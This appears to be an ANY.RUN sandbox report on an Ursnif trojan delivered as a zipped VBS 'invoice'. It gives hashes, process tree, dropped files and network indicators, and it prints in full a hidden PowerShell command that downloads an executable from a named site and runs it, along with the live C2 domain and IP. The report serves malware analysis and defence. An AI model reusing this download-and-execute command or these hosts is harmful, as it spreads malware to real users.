analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

SignIQ Pty Ltd invoice 127.zip

Full analysis: https://app.any.run/tasks/a022b60f-6b8f-4e98-9c48-ec09b744e317
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: April 15, 2019, 08:39:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
ursnif
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

1237AE60F76B5AECB8EB9FC55A858002

SHA1:

3CE266BAA2E645E85B01EB3CEDE10FFC4C15BE84

SHA256:

024B3CB1633DE1603168D69AF457AB313B56F9D609DF46BED4389A74D243E907

SSDEEP:

384:hryL7K2HYhSO4zre7SGTx7pv1MENKWfr+Lk3X8lfQc0yKj+pKZkJva:4L7bHYwO4wQq3TFlc+C0ZkY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • dVjiJafHlc.exe (PID: 2280)
    • Connects to CnC server

      • iexplore.exe (PID: 896)
      • iexplore.exe (PID: 2096)
      • iexplore.exe (PID: 792)
      • iexplore.exe (PID: 3336)
      • iexplore.exe (PID: 2616)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • WScript.exe (PID: 3160)
    • Creates files in the user directory

      • powershell.exe (PID: 3960)
    • Executes scripts

      • WinRAR.exe (PID: 1560)
  • INFO

    • Reads internet explorer settings

      • iexplore.exe (PID: 896)
      • iexplore.exe (PID: 792)
      • iexplore.exe (PID: 2096)
      • iexplore.exe (PID: 3336)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 896)
      • iexplore.exe (PID: 792)
      • iexplore.exe (PID: 2096)
      • iexplore.exe (PID: 3336)
      • iexplore.exe (PID: 2616)
    • Changes internet zones settings

      • iexplore.exe (PID: 1540)
      • iexplore.exe (PID: 3948)
      • iexplore.exe (PID: 1092)
      • iexplore.exe (PID: 3288)
      • iexplore.exe (PID: 1208)
    • Creates files in the user directory

      • iexplore.exe (PID: 896)
    • Application launched itself

      • iexplore.exe (PID: 1540)
      • iexplore.exe (PID: 1092)
      • iexplore.exe (PID: 3288)
      • iexplore.exe (PID: 1208)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: SignIQ Pty Ltd invoice 127.vbs
ZipUncompressedSize: 69345
ZipCompressedSize: 18326
ZipCRC: 0x98232722
ZipModifyDate: 2019:04:15 00:29:05
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
14
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe no specs powershell.exe no specs dvjijafhlc.exe no specs iexplore.exe iexplore.exe iexplore.exe iexplore.exe iexplore.exe iexplore.exe iexplore.exe iexplore.exe iexplore.exe iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
1560"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\SignIQ Pty Ltd invoice 127.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3160"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa1560.10886\SignIQ Pty Ltd invoice 127.vbs" C:\Windows\System32\WScript.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3960"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -exec bypass -nop if($host.version.major -lt 3){Import-Module BitsTransfer} Start-BitsTransfer -Source https://saintsandsinnersbar.com/duplicate/answear.xls -Destination $env:temp\dVjiJafHlc.exe; Start-Process $env:temp\dVjiJafHlc.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2280"C:\Users\admin\AppData\Local\Temp\dVjiJafHlc.exe" C:\Users\admin\AppData\Local\Temp\dVjiJafHlc.exepowershell.exe
User:
admin
Company:
INCA Internet Co., Ltd.
Integrity Level:
MEDIUM
Description:
nProtect KeyCrypt Program Database DLL
Version:
2003, 10, 1, 1
1540"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
896"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1540 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1092"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
792"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1092 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3948"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2096"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3948 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Total events
2 605
Read events
2 336
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
5
Text files
17
Unknown types
3

Dropped files

PID
Process
Filename
Type
3960powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HOBM1QQWIA8KW9D0R0MZ.temp
MD5:
SHA256:
1540iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
1540iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
1540iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF7A0D3A3A7EE65AF2.TMP
MD5:
SHA256:
1540iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFBB82DE0354F81D44.TMP
MD5:
SHA256:
1540iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{1AE0579D-5F5A-11E9-A09E-5254004A04AF}.dat
MD5:
SHA256:
1092iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\favicon[1].ico
MD5:
SHA256:
1092iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
1092iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF879E9C8509B4C6B5.TMP
MD5:
SHA256:
1092iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFD96B5A50705EF5DA.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
11
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1540
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
3288
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
1208
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
3948
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
1092
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1540
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
1092
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3948
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
94.23.14.191:443
saintsandsinnersbar.com
OVH SAS
FR
unknown
792
iexplore.exe
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
896
iexplore.exe
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
3336
iexplore.exe
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
3288
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2096
iexplore.exe
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
2616
iexplore.exe
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious

DNS requests

Domain
IP
Reputation
saintsandsinnersbar.com
  • 94.23.14.191
unknown
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
itschoolegz.com
  • 46.17.45.108
malicious

Threats

Found threats are available for the paid subscriptions
5 ETPRO signatures available at the full report
No debug info